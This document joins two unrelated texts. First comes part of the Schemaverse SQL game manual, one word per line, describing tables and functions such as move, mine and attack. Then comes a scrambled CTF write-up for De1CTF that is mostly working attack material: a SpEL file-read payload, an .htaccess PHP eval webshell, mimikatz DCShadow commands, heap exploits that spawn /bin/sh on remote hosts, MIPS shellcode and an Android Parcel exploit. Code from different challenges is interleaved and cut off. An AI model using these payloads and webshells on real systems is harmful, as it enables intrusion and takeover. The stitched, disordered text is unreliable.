Select
location_x
integer
Select
location_y
integer
Select
ships_in_range
Column
Type
Player
Permissions
id
integer
Select
ship_in_range_of
integer
Select
player_id
integer
Select
name
character
varying
Select
health
integer
Select
location_x
integer
Select
location_y
integer
Select
Page
29
of
42
planets
Column
Type
Player
Permissions
id
integer
Select
name
character
varying(50)
Select,
Update
mine_limit
integer
Select
location_x
integer
Select
location_y
integer
Select
conqueror_id
integer
Select
my_trades
Column
Type
Player
Permissions
id
integer
Select
player_id_1
integer
Select,
Insert
player_id_2
integer
Select,
Insert
confirmation_1
integer
Select,
Insert,
Update
confirmation_2
integer
Select,
Insert,
Update
complete
integer
Select
trade_items
Column
Type
Player
Permissions
Page
30
of
42
id
integer
Select,
Delete
trade_id
integer
Select,
Insert
player_id
integer
Select
description_code
character
varying
Select,
Insert
quantity
integer
Select,
Insert
descriptor
character
varying
Select,
Insert
trade_ship_stats
Column
Type
Player
Permissions
trade_id
integer
Select
player_id
integer
Select
description_code
character
varying
Select
quantity
integer
Select
descriptor
character
varying
Select
ship_id
integer
Select
ship_name
character
varying
Select
ship_current_health
integer
Select
ship_max_health
integer
Select
ship_current_fueld
integer
Select
ship_max_fuel
integer
Select
ship_max_speed
integer
Select
ship_range
integer
Select
ship_attack
integer
Select
ship_defense
integer
Select
ship_engineering
integer
Select
Page
31
of
42
ship_prospecting
integer
Select
ship_location_x
integer
Select
ship_location_y
integer
Select
online_players
Column
Type
Player
Permissions
id
integer
Select
username
character
varying
Select
current_stats
Column
Type
Player
Permissions
current_tic
integer
Select
total_players
integer
Select
online_players
integer
Select
total_ships
integer
Select
avg_ships
integer
Select
total_trades
integer
Select
active_trades
integer
Select
total_fuel_reserve
integer
Select
avg_fuel_reserve
integer
Select
Page
32
of
42
total_currency
integer
Select
avg_balance
integer
Select
public_variable
Column
Type
Player
Permissions
name
character
varying
Select
private
boolean
Select
numeric_value
integer
Select
char_value
character
varying
Select
description
text
Select
trophy_case
Column
Type
Player
Permissions
player_id
integer
Select
username
character
varying
Select
tropy
character
varying
Select
times_awarded
integer
Select
Page
33
of
42
Functions
Getting
around
move(Ship
ID,
Speed,
Direction,
Destination
X,
Destination
Y)
Use
this
function
to
move
ships
around
the
map.
Each
ship
can
execute
the
MOVE
command
once
per
tic.
At
the
end
of
a
tic,
if
the
ship
has
not
moved,
but
it
has
values
in
my_ships.speed
and
my_ships.direction
then
the
MOVE
command
will
be
executed
automatically
for
it.
It
is
also
important
to
note
that
moving
will
decrease
the
ship's
fuel
supply
when
accelerating
and
when
decelerating.
Whether
you
travel
100m
away
or
1,000,000m
away,
the
fuel
cost
will
be
2x
your
speed:
once
to
get
up
to
speed,
then
once
to
stop
at
your
destination.
In
addition,
fuel
is
deducted
when
changing
headings
mid-‐flight
at
a
cost
of
1
fuel
unit
per
degree
changed
mid-‐flight.
Any
errors
that
occur
during
this
function
will
be
piped
through
the
player’s
error_channel.
Parameters
Name
Type
Description
Ship
ID
integer
Speed
integer
Cannot
be
greater
then
my_ships.max_speed
Direction
integer
Leave
this
as
NULL
to
have
your
ship
automatically
go
in
the
direction
required
to
get
to
your
destination.
A
destination
is
required
if
this
is
set
to
NULL.
Destination
X
integer
Use
Destination
X
and
Destination
Y
to
tell
the
system
to
clear
values
my_ships.speed
and
my_ships.direction
once
the
destination
is
in
range.
This
will
stop
the
ship
from
moving
automatically
next
turn
away
from
the
destination
Destination
Y
integer
Leave
Destination
X
and
Destination
Y
as
NULL
if
you
don’t
want
to
stop.
You
must
specify
a
non-‐NULL
direction
if
these
are
NULL.
Returns
Type
Description
Page
34
of
42
boolean
Returns
TRUE
(t)
if
the
ships
move
is
successful
and
FALSE
(f)
if
it
is
not.
refuel_ship(Ship
ID)
Using
this
function
will
take
fuel
from
your
players
fuel
reserve
(my_player.fuel_reserve)
and
add
it
to
the
fuel
of
the
specified
ship
ID.
It
will
always
fill
up
the
ship
to
the
level
of
max_fuel.
This
does
not
count
as
a
ship
action.
Errors
that
occur
during
this
function
are
piped
through
the
player’s
error_channel.
Parameters
Name
Type
Description
Ship
ID
integer
Returns
Type
Description
integer
Returns
amount
of
fuel
added
to
the
ship.
Actions
attack(Attacking
Ship
ID,
Enemy
Ship
ID)
Use
this
function
to
attack
other
ships.
Be
careful
though,
friendly
fire
is
possible!
When
the
attack
is
executed
successfully,
an
event
will
be
added
to
the
my_events
view
for
both
players
involved.
Any
errors
that
occur
during
this
function
will
be
piped
through
the
player’s
error_channel.
Using
this
function
will
act
as
an
Action
for
the
ship.
The
ship
will
not
be
able
to
perform
another
action
until
the
game
tic
increases.
Parameters
Name
Type
Description
Attacking
Ship
ID
integer
Enemy
Ship
ID
integer
Returns
Page
35
of
42
Type
Description
integer
Damage
done
in
attack
to
enemy
ship
mine(Mining
Ship
ID,
Planet
ID)
Use
this
function
to
mine
planets
that
are
in
range.
Mining
is
important,
because
it
allows
you
to
acquire
fuel
that
can
power
your
fleets
or
be
converted
to
cash,
in
order
to
purchase
upgrades.
When
a
ship
starts
mining
by
calling
this
command,
the
ship
is
added
to
one
of
the
hidden
Schemaverse
system
tables.
At
the
end
of
each
system
tic,
the
Schemaverse
tic.pl
script
executes
a
function
called
mine_planets().
For
each
planet
currently
being
mined
this
tic,
the
system
takes
a
look
at
each
ships
prospecting
abilities
and
the
amount
of
mining
that
can
occur
on
a
planet
and
calculates
which
ship(s)
have
successfully
mined
the
planet.
Once
the
actual
mining
takes
place,
the
information
will
be
added
to
the
my_events
view
for
all
involved
players.
At
some
point
I
will
write
a
separate
wiki
page
to
describe
the
mining
process
in
a
bit
more
detail.
Any
errors
that
occur
during
mining
will
be
piped
through
the
player’s
error_channel.
Using
this
function
will
act
as
an
Action
for
the
ship.
The
ship
will
not
be
able
to
perform
another
action
until
the
game
tic
increases.
Parameters
Name
Type
Description
Mining
Ship
ID
integer
Planet
ID
integer
The
Planet
must
be
in
range
of
the
ship
attempting
to
mine
it
Returns
Type
Description
boolean
Returns
TRUE
(t)
if
the
ship
was
successfully
added
to
the
current
mining
table
for
this
tic.
Returns
FALSE
(f)
if
the
ship
is
out
of
range
and
could
not
be
added
Page
36
of
42
repair(Repair
Ship
ID,
Damaged
Ship
ID)
Use
this
function
to
repair
other
ships.
A
ship
with
zero
health
cannot
perform
actions.
When
the
repair
is
executed
successfully,
the
RepairShip’s
Engineering
value
will
be
added
to
the
DamagedShip’s
health,
and
an
event
will
be
added
to
the
my_events
view
for
the
player
involved.
Any
errors
that
occur
during
this
function
will
be
piped
through
the
player’s
error_channel.
Using
this
function
will
act
as
an
Action
for
the
ship.
The
ship
will
not
be
able
to
perform
another
action
until
the
game
tic
increases.
Parameters
Name
Type
Description
Repair
Ship
ID
integer
Damaged
Ship
ID
integer
Returns
Type
Description
integer
Health
regained
by
the
ship
Purchasing
and
Trading
convert_resource(Current
Resource
Type,
Amount
to
Convert)
Use
this
function
to
convert
fuel
to
currency,
or
vice
versa.
The
value
of
the
fuel
will
fluctuate
based
on
levels
in
the
game.
Any
errors
that
occur
during
this
function
will
be
piped
through
the
player’s
error_channel.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Page
37
of
42
Parameters
Name
Type
Description
Current
Resource
Type
character
varying
What
is
the
player
selling
for
conversion;
either
the
string
‘FUEL’
or
‘MONEY’
Amount
to
Convert
integer
Returns
Type
Description
integer
Total
resources
acquired
from
the
conversion
upgrade(Ship
ID
|
Fleet
ID,
Product
Code,
Quantity)
Use
this
function
to
upgrade
your
fleets
or
your
ships.
This
does
not
count
as
a
ship
action.
To
see
a
list
of
what
is
available
for
upgrade,
run
a
SELECT
on
the
price_list
table.
Then
use
the
code
listed
there
for
the
Product
Code
parameter
for
this
function.
There
are
a
maximum
amount
of
upgrades
that
can
be
done
to
ships.
To
learn
the
maximums
look
to
the
public_variable
view.
Any
errors
that
occur
during
this
function
will
be
piped
through
the
player’s
error_channel.
Parameters
Name
Type
Description
Ship
ID
|
Fleet
ID
integer
Product
Code
character
varying
See
the
price_list
table
for
a
list
of
values
to
use
here.
Quantity
integer
Returns
Page
38
of
42
Type
Description
boolean
Returns
TRUE
(t)
if
the
purchase
was
successful
and
FALSE
(f)
if
there
was
a
problem
Utilities
get_char_variable(Variable
Name)
This
utility
function
simply
makes
it
easier
to
recall
character
varying
values
from
the
public_variable
view.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Variable
Name
character
varying
The
name
of
the
value
you
wish
to
return
from
public_variable
Returns
Type
Description
character
varying
The
matching
character
varying
value
from
the
public_variable
view
get_numeric_variable(Variable
Name)
This
utility
function
simply
makes
it
easier
to
recall
integer
values
from
the
public_variable
view.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Variable
Name
character
varying
The
name
of
the
value
you
wish
to
return
from
public_variable
Returns
Page
39
of
42
Type
Description
integer
The
matching
integer
value
from
the
public_variable
view
get_player_id(Player
Username)
This
utility
function
performs
a
lookup
of
a
users
player
id
based
on
the
username
given.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Player
Username
character
varying
Returns
Type
Description
integer
The
player
id
for
the
username
supplied
get_player_username(Player
ID)
This
utility
function
performs
a
lookup
of
a
player’s
username
based
on
the
Player
ID
given.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Player
ID
integer
Returns
Type
Description
character
varying
The
player
username
for
the
Player
ID
supplied
Page
40
of
42
get_player_error_channel(Player
Username
[DEFAULT
SESSION_USER])
This
utility
function
performs
a
lookup
of
a
user’s
error_channel
based
on
the
username
given.
This
information
is
readily
available
from
my_players
but
this
just
makes
the
lookup
easier.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Player
Username
character
varying
Returns
Type
Description
character(10)
The
error
channel
for
the
username
supplied
in_range_planet(Ship
ID,
Planet
ID)
This
utility
function
performs
a
lookup
to
see
if
a
ship
is
within
range
of
a
specified
planet.
It's
helpful
to
find
out
if
a
ship
is
able
to
mine
a
planet
during
this
tic.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Ship
ID
integer
Planet
ID
integer
Returns
Type
Description
boolean
Returns
TRUE
(t)
if
the
Planet
is
within
range
and
FALSE
(f)
if
it
is
not
Page
41
of
42
in_range_ship(Ship
ID,
Ship
ID)
This
utility
function
performs
a
lookup
to
see
if
a
ship
is
within
range
of
another
specified
ship.
It's
helpful
to
find
out
if
a
ship
is
able
to
attack
or
repair
the
other
ship
during
this
tic.
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Name
Type
Description
Ship
ID
integer
Ship
ID
integer
Returns
Type
Description
boolean
Returns
TRUE
(t)
if
the
Ships
are
within
range
and
FALSE
(f)
if
they
are
not
read_event(Event
ID)
This
utility
uses
the
available
data
within
a
row
of
the
event
table
to
convert
the
information
into
a
readable
string
of
text.
Consider
the
following
entry
in
my_events:
EventID
Action
player_id_1
ship_id_1
referencing_id
descriptor_numeric
public
171
MINE_SUCCESS
1
1
1
1879
t
SELECT
READ_EVENT(171)
as
string_event;
will
return
the
following:
string_event
(#1)cmdr’s
ship
(#1)dog
has
successfully
mined
1879
fuel
from
the
planet
(#1)Torono"
Using
this
function
does
not
count
as
an
action
and
can
be
run
as
often
as
you
like.
Parameters
Page
42
of
42
Name
Type
Description
Event
ID
integer
Returns
Type
Description
Text
Returns
the
text
based
on
the
type
of
action
being
read
and
event
details | pdf |
De1CTF WP
Author:Nu1L Team
De1CTF WP
Misc
Misc/Misc Chowder
mc_join
Web
clac
check in
Hard_Pentest_1&2
Pwn
stl_container
code_runner
BroadCastTest
pppd
Crypto
ECDH
NLFSR
Homomorphic
Re
/little elves
parser
FLw
Misc
Misc/Misc Chowder
, pnghttps://drive.google.com/file/d/1JBdPj7eRaXuLCTFGn7Al
uAxmxQ4k1jvX/view
docx, , You_found_me_Orz.zip, ,
You_found_me_Orz.jpg, rar, 7z666.jpg:fffffffflllll.txt
mc_join
import time
import socket
import threading
import thread
import struct
def str2hex(data):
res = ''
for i in data:
res += hex(ord(i)).replace('0x','')
return res
def log(strLog):
strs = time.strftime("%Y-%m-%d %H:%M:%S")
print strs + " -> " + strLog
def start_thread(thread_class):
thread.start_new_thread(thread_class.run, ())
class pipethreadSend(threading.Thread):
'''
classdocs
'''
def __init__(self,source,sink,recv_thread=None):
'''
Constructor
'''
threading.Thread.__init__(self)
self.source = source
self.sink = sink
self.recv_thread = recv_thread
self.__is_runing = True
log("New send Pipe create:%s->%s" %
(self.source.getpeername(),self.sink.getpeername()))
def run(self):
self.source.settimeout(60)
while True:
try:
data = self.source.recv(4096)
break
except socket.timeout:
continue
except Exception as e:
log("first Send message failed")
log(str(e))
self._end()
return
if data is None:
log("first Send message none")
self._end()
return
data =
data.replace('MC2020','20w14a').replace(':997',':710').replace('\x00\xca\x0
5','\x00\xe5\x07')
# add verify here
try:
self.sink.send(data)
except Exception:
self._end()
return
self.source.settimeout(60)
while self.__is_runing:
try:
try:
data = self.source.recv(4096)
except socket.timeout:
continue
if not data: break
data =
data.replace('MC2020','20w14a').replace(':997',':710').replace('\x00\xca\x0
5','\x00\xe5\x07')
self.sink.send(data)
except Exception ,ex:
log("redirect error:" + str(ex))
break
self._end()
def terminate(self):
self.__is_runing = False
def _end(self):
self.recv_thread.terminate()
try:
self.source.close()
self.sink.close()
except Exception:
pass
class pipethreadRecv(threading.Thread):
'''
classdocs
'''
def __init__(self,source,sink,send_thread=None):
'''
Constructor
'''
threading.Thread.__init__(self)
self.source = source
self.sink = sink
self.key = ''
self.send_thread = send_thread
self.__is_runing = True
log("New recv Pipe create:%s->%s" %
(self.source.getpeername(),self.sink.getpeername()))
def run(self):
self.source.settimeout(60)
while True:
try:
data = self.source.recv(4096)
break
except socket.timeout:
continue
except Exception as e:
log("first recv message failed")
log(str(e))
self._end()
return
if data is None:
log("first recv message none")
self._end()
return
print(data)
data =
data.replace('MC2020','20w14a').replace(':997',':710').replace('\x00\xca\x0
5','\x00\xe5\x07')
try:
self.sink.send(data)
except Exception:
self._end()
return
self.source.settimeout(60)
while self.__is_runing:
try:
try:
data = self.source.recv(4096)
except socket.timeout:
continue
if not data: break
data =
data.replace('MC2020','20w14a').replace(':997',':710').replace('\x00\xca\x0
5','\x00\xe5\x07')
self.sink.send(data)
except Exception ,ex:
log("redirect error:" + str(ex))
break
self._end()
def terminate(self):
self.__is_runing = False
def _end(self):
self.send_thread.terminate()
try:
self.source.close()
self.sink.close()
except Exception:
pass
class portmap(threading.Thread):
def __init__(self, port, newhost, newport, local_ip=''):
threading.Thread.__init__(self)
self.newhost = newhost
self.newport = newport
self.port = port
self.local_ip = local_ip
self.protocol = 'tcp'
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.bind((self.local_ip, port))
self.sock.listen(5)
log("start listen protocol:%s,port:%d " % (self.protocol, port))
def run(self):
self.sock.settimeout(5)
while True:
try:
newsock, address = self.sock.accept()
except socket.timeout:
continue
log("new connection->protocol:%s,local port:%d,remote
address:%s" % (self.protocol, self.port,address[0]))
fwd = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
fwd.connect((self.newhost,self.newport))
except Exception ,ex:
log("connet newhost error:" + str(ex))
break
p2 = pipethreadRecv(fwd, newsock)
p1 = pipethreadSend(newsock, fwd, p2)
p2.send_thread = p1
start_thread(p1)
start_thread(p2)
# p1.start()
# p2.start()
# self.sock.listen(5)
class pipethreadUDP(threading.Thread):
def __init__(self, connection, connectionTable, table_lock):
threading.Thread.__init__(self)
self.connection = connection
self.connectionTable = connectionTable
self.table_lock = table_lock
log('new thread for new connction')
def run(self):
while True:
try:
data,addr = self.connection['socket'].recvfrom(4096)
#log('recv from addr"%s' % str(addr))
except Exception, ex:
log("recvfrom error:" + str(ex))
break
try:
self.connection['lock'].acquire()
self.connection['Serversocket'].sendto(data,self.connection['address'])
#log('sendto address:%s' % str(self.connection['address']))
except Exception ,ex:
log("sendto error:" + str(ex))
break
finally:self.connection['lock'].release()
self.connection['time'] = time.time()
self.connection['socket'].close()
log("thread exit for: %s" % str(self.connection['address']))
self.table_lock.acquire()
self.connectionTable.pop(self.connection['address'])
self.table_lock.release()
log('Release udp connection for timeout:%s' %
str(self.connection['address']))
class portmapUDP(threading.Thread):
def __init__(self, port, newhost, newport, local_ip=''):
threading.Thread.__init__(self)
self.newhost = newhost
self.newport = newport
self.port = port
self.local_ip = local_ip
self.sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
self.sock.bind((self.local_ip,port))
self.connetcTable = {}
self.port_lock = threading.Lock()
self.table_lock = threading.Lock()
self.timeout = 300
#ScanUDP(self.connetcTable,self.table_lock).start()
log('udp port redirect run-
>local_ip:%s,local_port:%d,remote_ip:%s,remote_port:%d' %
(local_ip,port,newhost,newport))
def run(self):
while True:
Web
clac
/flag/flag
Payload
'calc':'T\x00(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Files").rea
dAllLines(T\x00(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Paths"
).get("/flag"))'
check in
data,addr = self.sock.recvfrom(4096)
connection = None
newsock = None
self.table_lock.acquire()
connection = self.connetcTable.get(addr)
newconn = False
if connection is None:
connection = {}
connection['address'] = addr
newsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
newsock.settimeout(self.timeout)
connection['socket'] = newsock
connection['lock'] = self.port_lock
connection['Serversocket'] = self.sock
connection['time'] = time.time()
newconn = True
log('new connection:%s' % str(addr))
self.table_lock.release()
try:
connection['socket'].sendto(data,
(self.newhost,self.newport))
except Exception ,ex:
log("sendto error:" + str(ex))
#break
if newconn:
self.connetcTable[addr] = connection
t1 =
pipethreadUDP(connection,self.connetcTable,self.table_lock)
t1.start()
log('main thread exit')
for key in self.connetcTable.keys():
self.connetcTable[key]['socket'].close()
if __name__ == '__main__':
myp = portmap(25565, '134.175.230.10', 25565)
myp.start()
.htaccess
php
Hard_Pentest_1&2
webshell
FlagHinthintDe1ta
KerberoastHintDe1taExtendRights
ExtenRightsDcshadow
De1taSystemDe1taDMGenric Write
System beaconmake token
mimikatz !lsadump::dcshadow /object:De1ta /attribute:primaryGroupID /value:514
mimikatz @lsadump::dcshadow /push
De1taprimaryGroupIDsmb
dc
Pwn
stl_container
AddType application/x-httpd-p\
hp .zzz
p\
hp_value short_open_tag On
<? eval($_POST[a]);
from pwn import *
local = 0
# p = process('./stl_container')
p = remote('134.175.239.26', 8848)
context.log_level = 'debug'
def launch_gdb():
if local != 1:
return
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
gdb.attach(proc.pidof(p)[0])
iii = 1
def add(s):
p.recvuntil('>> ')
p.sendline(str(iii))
p.recvuntil('>> ')
p.sendline('1')
p.recvuntil('input data:')
p.send(s)
def dele(i):
p.recvuntil('>> ')
p.sendline(str(iii))
p.recvuntil('>> ')
p.sendline('2')
if iii == 3 or iii == 4:
return
p.recvuntil('index?')
p.sendline(str(i))
def show(i):
p.recvuntil('>> ')
p.sendline(str(iii))
p.recvuntil('>> ')
p.sendline('3')
p.recvuntil('index?')
p.sendline(str(i))
launch_gdb()
for i in xrange(1,5):
iii = i
add('aaaa')
add('aaaa')
iii = 2
dele(0)
for i in [1,3]:
iii = i
dele(0)
dele(0)
iii = 4
dele(0)
iii = 2
dele(0)
for i in [3]:
iii = i
add('aaa')
add('aaa')
iii = 4
code_runner
binary
16checkshellcode
checkangr
patternangr
patterncheckhashz3
add('aaa')
iii = 2
add('aaa')
iii = 1
add('aaa')
# iii = 2
# raw_input()
# add('a' * 0x98)
add('\xa0')
show(1)
p.recvuntil('data: ')
leak = p.recv(6) + '\x00\x00'
leak = u64(leak)
log.info(hex(leak))
libc_base = leak - 4111520
free_hook = 4118760 + libc_base
sys_addr = 324672 + libc_base
iii = 3
dele(0)
dele(0)
iii = 2
add('aaa')
dele(0)
dele(0)
iii = 3
add(p64(free_hook-0x8))
iii = 2
add('/bin/sh\x00' + p64(sys_addr))
# add('/bin/sh\x00')
p.interactive()
# asb(s[0]*s[0]-s[3]*s[3])?asb(s[1]*s[1]-s[2]*s[2])
# asb(s[1]*s[1]-s[0]*s[0])?asb(s[2]*s[2]-s[3]*s[3])
shellcodecheckcheck1s
0xcbyteshellcodemaincheckshellcode
getshell
1s
import angr
import claripy
import re
import hashlib
from capstone import *
import sys
from pwn import *
import time
from random import *
import os
import logging
logging.getLogger('angr').setLevel('ERROR')
logging.getLogger('angr.analyses').setLevel('ERROR')
logging.getLogger('pwnlib.asm').setLevel('ERROR')
logging.getLogger('angr.analyses.disassembly_utils').setLevel('ERROR')
context.log_level = "ERROR"
def pow(hash):
for i in range(256):
for j in range(256):
for k in range(256):
tmp = chr(i)+chr(j)+chr(k)
if hash == hashlib.sha256(tmp).hexdigest():
print tmp
return tmp
#21190da8c2a736569d9448d950422a7a a1 < a2
#2a1fae6743ccdf0fcaf6f7af99e89f80 a2 <= a1
#8342e17221ff79ac5fdf46e63c25d99b a1 < a2
#51882b30d7af486bd0ab1ca844939644 a2 <= a1
tb = {
"6aa134183aee6a219bd5530c5bcdedd7":{
'21190da8c2a736569d9448d950422a7a':{
'8342e17221ff79ac5fdf46e63c25d99b':"\\xed\\xd1\\xda\\x33",
'51882b30d7af486bd0ab1ca844939644':"\\x87\\x6e\\x45\\x82"
},
'2a1fae6743ccdf0fcaf6f7af99e89f80':{
'51882b30d7af486bd0ab1ca844939644':'\\xb7\\x13\\xdf\\x8d',
'8342e17221ff79ac5fdf46e63c25d99b':'\\x2f\\x0f\\x2c\\x02'
}
},
"745482f077c4bfffb29af97a1f3bd00a":{
'21190da8c2a736569d9448d950422a7a':{
'51882b30d7af486bd0ab1ca844939644':"\\x57\\xcf\\x81\\xe7",
'8342e17221ff79ac5fdf46e63c25d99b':"\\x80\\xbb\\xdf\\xb1"
},
'2a1fae6743ccdf0fcaf6f7af99e89f80':{
'51882b30d7af486bd0ab1ca844939644':"\\x95\\x3e\\xf7\\x4e",
'8342e17221ff79ac5fdf46e63c25d99b':"\\x1a\\xc3\\x00\\x92"
}
},
"610a69b424ab08ba6b1b2a1d3af58a4a":{
'21190da8c2a736569d9448d950422a7a':{
'51882b30d7af486bd0ab1ca844939644':"\\xfb\\xef\\x2b\\x2f",
'8342e17221ff79ac5fdf46e63c25d99b':"\\x10\\xbd\\x00\\xac"
},
'2a1fae6743ccdf0fcaf6f7af99e89f80':{
'51882b30d7af486bd0ab1ca844939644':'\\xbd\\x7a\\x55\\xd3',
'8342e17221ff79ac5fdf46e63c25d99b':'\\xbc\\xbb\\xff\\x4a'
}
},
"b93e4feb8889770d981ef5c24d82b6cc":{
'21190da8c2a736569d9448d950422a7a':{
'51882b30d7af486bd0ab1ca844939644':"\\x2f\\xfb\\xef\\x2b",
'8342e17221ff79ac5fdf46e63c25d99b':"\\xac\\x10\\xbd\\x00"
},
'2a1fae6743ccdf0fcaf6f7af99e89f80':{
'8342e17221ff79ac5fdf46e63c25d99b':'\\x4a\\xbc\\xbb\\xff',
'51882b30d7af486bd0ab1ca844939644':'\\xd3\\xbd\\x7a\\x55'
}
}
}
def findhd(addr):
while True:
code = f[addr:addr + 4]
if(code == "e0ffbd27".decode("hex")):
return addr
addr -= 4
def dejmp(code):
c = ""
d = Cs(CS_ARCH_MIPS,CS_MODE_MIPS32)
for i in d.disasm(code,0):
flag = 1
if("b" in i.mnemonic or "j" in i.mnemonic):
flag = 0
#print("0x%x:\\t%s\\t%s"%(i.address,i.mnemonic,i.op_str))
if flag == 1:
c += code[i.address:i.address+4]
return c
def calc(func_addr,find,avoid):
start_address = func_addr
state = p.factory.blank_state(addr=start_address)
tmp_addr = 0x20000
ans = claripy.BVS('ans', 4 * 8)
state.memory.store(tmp_addr, ans)
state.regs.a0 = 0x20000
sm = p.factory.simgr(state)
sm.explore(find=find,avoid=avoid)
if sm.found:
solution_state = sm.found[0]
solution = solution_state.se.eval(ans)#,cast_to=str)
# print(hex(solution))
return p32(solution)[::-1]
def Calc(func_addr,find,avoid):
try:
tmp1 = hashlib.md5(dejmp(f[avoid - 0x80:avoid])).hexdigest()
tmp2 = hashlib.md5(f[avoid-0xdc:avoid-0xdc+4]).hexdigest()
tmp3 = hashlib.md5((f[avoid - 0x24:avoid-0x20])).hexdigest()
return tb[tmp1][tmp2][tmp3]
except:
try:
ret = calc(func_addr + base,find + base,avoid + base)
return ret
except:
print "%s %s %s %x"%(tmp1,tmp2,tmp3,func_addr)
while True:
try:
os.system("rm out.gz")
os.system("rm out")
r = remote("106.53.114.216",9999)
r.recvline()
sha = r.recvline()
sha = sha.split("\\"")[1]
s = pow(sha)
r.sendline(s)
log.success("pass pow")
r.recvuntil("===============\\n")
dump = r.recvline()
log.success("write gz")
o = open("out.gz","wb")
o.write(dump.decode("base64"))
o.close()
log.success("gunzip")
os.system("gzip -d out.gz")
os.system("chmod 777 out")
log.success("angr")
filename = "out"
base = 0x400000
p = angr.Project(filename,auto_load_libs = False)
f = open(filename,"rb").read()
final = 0xb30
vd = [i.start()for i in re.finditer("25100000".decode("hex"),f)]
vd = vd[::-1]
chk = ""
n = 0
for i in range(len(vd) - 1):
if(vd[i] <= 0x2000):
n += 1
func = findhd(vd[i])
find = findhd(vd[i + 1])
avoid = vd[i]
ret = Calc(func,find,avoid)
# print ret
chk += ret
n += 1
func = findhd(vd[len(vd) - 1])
find = final
avoid = vd[len(vd) - 1]
ret = Calc(func,find,avoid)
# print ret
chk += ret
print chk.encode("hex")
r.recvuntil("Faster")
r.sendafter(">",chk)
context.arch = 'mips'
success(r.recvuntil("Name"))
r.sendafter(">","g"*8)
ret_addr = vd[1]-0x34-0x240+base
success(hex(ret_addr))
shellcode = 'la $v1,{};'.format(hex(ret_addr))
shellcode += 'jr $v1;'
shellcode = asm(shellcode)
print(shellcode.encode('hex'))
BroadCastTest
https://xz.aliyun.com/t/2364#toc-0
r.sendafter(">",shellcode)
r.sendafter("Faster > ",chk)
success(r.recvuntil("Name"))
r.sendafter(">","gg")
shellcode = ''
shellcode += "\\xff\\xff\\x06\\x28"
shellcode += "\\xff\\xff\\xd0\\x04"
shellcode += "\\xff\\xff\\x05\\x28"
shellcode += "\\x01\\x10\\xe4\\x27"
shellcode += "\\x0f\\xf0\\x84\\x24"
shellcode += "\\xab\\x0f\\x02\\x24"
shellcode += "\\x0c\\x01\\x01\\x01"
shellcode += "/bin/sh"
print(len(shellcode))
r.sendafter(">",shellcode)
r.interactive()
except Exception as e:
print e
Parcel data = Parcel.obtain();
data.writeInt(4); // entries
// id
data.writeString("id");
data.writeInt(1);
data.writeInt(233);
// class
data.writeString("test");
data.writeInt(4); // value is Parcelable
data.writeString("com.de1ta.broadcasttest.MainActivity$Message");
data.writeString("233");
for(int i=0;i<16;i++)
{
data.writeInt(0);
}
data.writeInt(0xdeadbeef); // vul var
data.writeInt(0);
// fake str
data.writeInt(29);
data.writeInt(0xdeadbeef);
data.writeInt(9);
data.writeInt(0);
data.writeInt(7);
data.writeInt(7274595);
data.writeInt(7143533);
data.writeInt(7209057);
data.writeInt(100);
data.writeInt(0);
data.writeInt(7);
data.writeInt(6619239);
data.writeInt(6684788);
data.writeInt(6357100);
data.writeInt(0x67);
data.writeInt(0);
data.writeInt(0); // value is string
data.writeString("aaa");
data.writeString("command"); // bytearray data -> hidden key
data.writeInt(0); // value is string
data.writeString("aaaaaaaaaaaaaaaaaaaaaaaaaa");
data.writeString("A padding");
data.writeInt(0); // value is string
data.writeString("to match pair count");
int length = data.dataSize();
Parcel bndl = Parcel.obtain();
bndl.writeInt(length);
bndl.writeInt(0x4C444E42); // bundle magic
bndl.appendFrom(data, 0, length);
bndl.setDataPosition(0);
byte[] v4 = bndl.marshall();
TextView t = findViewById(R.id.hw);
String s = bytesToHex(v4);
exp:
from pwn import *
from hashlib import sha256
import string
pppd
context.log_level = 'debug'
def get_a(a):
for i1 in string.printable:
for i2 in string.printable:
for i3 in string.printable:
for i4 in string.printable:
aa = i1+i2+i3+i4
if sha256(a + aa).digest().startswith(b'\\0\\0\\0'):
print(aa)
return aa
# nc 206.189.186.98 8848
p = remote('206.189.186.98',8848)
payload =
'CC010000424E444C0400000002000000690064000000000001000000E90000000400000074
0065007300740000000000040000002C00000063006F006D002E00640065003100740061002
E00620072006F0061006400630061007300740074006500730074002E004D00610069006E00
4100630074006900760069007400790024004D0065007300730061006700650000000000030
000003200330033000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000E
FBEADDE000000001D000000EFBEADDE09000000A40000000700000063006F006D006D006100
6E0064000000000000000700000067006500740066006C00610067000000000000000000000
00300000061006100610000000700000063006F006D006D0061006E0064000000000000001A
000000610061006100610061006100610061006100610061006100610061006100610061006
100610061006100610061006100610061000000000009000000410020007000610064006400
69006E0067000000000000001300000074006F0020006D00610074006300680020007000610
069007200200063006F0075006E0074000000'.decode('hex')
p.recvuntil('chal= ')
a = p.recvline()
a = a.replace('\\n','')
print(a)
p.send(get_a(a))
p.recvuntil('size')
p.sendline(str(len(payload)))
p.recvuntil('payload:')
p.send(payload)
p.interactive()
eap.c eap_request() EAPT_MD5CHAP patch
payload→ROP→shellcode
pppd noauth local lock defaultroute debug nodetach /tmp/serial 9600
Crypto
ECDH
git clone <https://github.com/paulusmack/ppp.git>
cd ppp/
git checkout ppp-2.4.8 //
eap.c 1453
./configure
make -j8
make install
char sc[1024] =
